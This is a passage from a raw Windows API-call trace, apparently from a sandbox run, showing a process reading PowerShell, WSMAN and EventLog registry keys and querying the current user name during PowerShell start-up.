lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e318 | out: phkResult=0x25e318*=0x344) returned 0x0 [0044.661] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x0, lpcbData=0x25e35c*=0x0 | out: lpType=0x25e360*=0x1, lpData=0x0, lpcbData=0x25e35c*=0x56) returned 0x0 [0044.661] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e360, lpData=0x54e2a0, lpcbData=0x25e35c*=0x56 | out: lpType=0x25e360*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e35c*=0x56) returned 0x0 [0044.661] RegCloseKey (hKey=0x344) returned 0x0 [0044.662] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x70767ae7, Data2=0xf2e1, Data3=0x4dc7, Data4=([0]=0x83, [1]=0x8, [2]=0x81, [3]=0xf7, [4]=0xba, [5]=0xb9, [6]=0x3d, [7]=0xb5))) returned 0x0 [0044.662] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x8537c3bb, Data2=0xec8d, Data3=0x49c5, Data4=([0]=0xb7, [1]=0xfa, [2]=0x69, [3]=0xd5, [4]=0xb, [5]=0x43, [6]=0x43, [7]=0x76))) returned 0x0 [0044.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e40c | out: phkResult=0x25e40c*=0x344) returned 0x0 [0044.668] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e45c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e460, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e45c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e460*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.669] RegEnumValueW (in: hKey=0x344, dwIndex=0x0, lpValueName=0x54e2a0, lpcchValueName=0x25e484, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e484, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0044.669] RegEnumValueW (in: hKey=0x344, dwIndex=0x1, lpValueName=0x54e2a0, lpcchValueName=0x25e484, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e484, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0044.669] RegQueryValueExW (in: hKey=0x344, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e464, lpData=0x0, lpcbData=0x25e460*=0x0 | out: lpType=0x25e464*=0x1, lpData=0x0, lpcbData=0x25e460*=0x8) returned 0x0 [0044.669] RegQueryValueExW (in: hKey=0x344, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e464, lpData=0x54e2a0, lpcbData=0x25e460*=0x8 | out: lpType=0x25e464*=0x1, lpData="2.0", lpcbData=0x25e460*=0x8) returned 0x0 [0044.700] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3c8 | out: phkResult=0x25e3c8*=0x314) returned 0x0 [0044.700] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e418, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e41c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e418*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e41c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.701] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x54e2a0, lpcchValueName=0x25e440, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x25e440, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0044.701] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x54e2a0, lpcchValueName=0x25e440, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x25e440, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0044.701] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e420, lpData=0x0, lpcbData=0x25e41c*=0x0 | out: lpType=0x25e420*=0x1, lpData=0x0, lpcbData=0x25e41c*=0x8) returned 0x0 [0044.701] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x25e420, lpData=0x54e2a0, lpcbData=0x25e41c*=0x8 | out: lpType=0x25e420*=0x1, lpData="2.0", lpcbData=0x25e41c*=0x8) returned 0x0 [0044.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.701] GetLastError () returned 0xcb [0044.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.702] GetLastError () returned 0xcb [0044.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x318) returned 0x0 [0044.730] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3f0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3ec, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3f0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3ec*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.730] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.731] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.731] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.731] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x54e2a0, lpcchName=0x25e40c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e40c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.731] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x31c) returned 0x0 [0044.731] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.731] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x338) returned 0x0 [0044.731] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.731] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x348) returned 0x0 [0044.731] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.732] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x34c) returned 0x0 [0044.732] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.732] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x350) returned 0x0 [0044.732] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.732] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x354) returned 0x0 [0044.732] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.732] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x358) returned 0x0 [0044.732] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.732] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x35c) returned 0x0 [0044.733] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x0) returned 0x2 [0044.733] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x360) returned 0x0 [0044.733] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e3b8 | out: phkResult=0x25e3b8*=0x364) returned 0x0 [0044.733] RegCloseKey (hKey=0x364) returned 0x0 [0044.733] RegCloseKey (hKey=0x318) returned 0x0 [0044.733] RegCloseKey (hKey=0x360) returned 0x0 [0044.749] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.749] GetLastError () returned 0x3 [0044.750] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x318) returned 0x0 [0044.772] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.772] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.773] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.773] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x364) returned 0x0 [0044.773] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.773] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x368) returned 0x0 [0044.773] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.773] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x36c) returned 0x0 [0044.773] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.773] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x370) returned 0x0 [0044.773] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.774] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x374) returned 0x0 [0044.774] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.774] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x378) returned 0x0 [0044.774] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.774] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x37c) returned 0x0 [0044.774] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.774] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x380) returned 0x0 [0044.774] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.774] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x384) returned 0x0 [0044.774] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x388) returned 0x0 [0044.775] RegCloseKey (hKey=0x388) returned 0x0 [0044.775] RegCloseKey (hKey=0x318) returned 0x0 [0044.775] RegCloseKey (hKey=0x384) returned 0x0 [0044.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e36c | out: phkResult=0x25e36c*=0x384) returned 0x0 [0044.775] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3d4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3d4*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3d0*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.775] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.775] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.775] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.775] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.775] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.776] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.776] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.776] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.776] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x54e2a0, lpcchName=0x25e3f0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3f0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.776] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x318) returned 0x0 [0044.776] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.776] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x388) returned 0x0 [0044.776] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.776] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x38c) returned 0x0 [0044.776] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.777] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x390) returned 0x0 [0044.777] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.777] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x394) returned 0x0 [0044.777] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.777] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x398) returned 0x0 [0044.777] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.777] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x39c) returned 0x0 [0044.778] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.778] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x3a0) returned 0x0 [0044.778] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x0) returned 0x2 [0044.778] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x3a4) returned 0x0 [0044.778] RegOpenKeyExW (in: 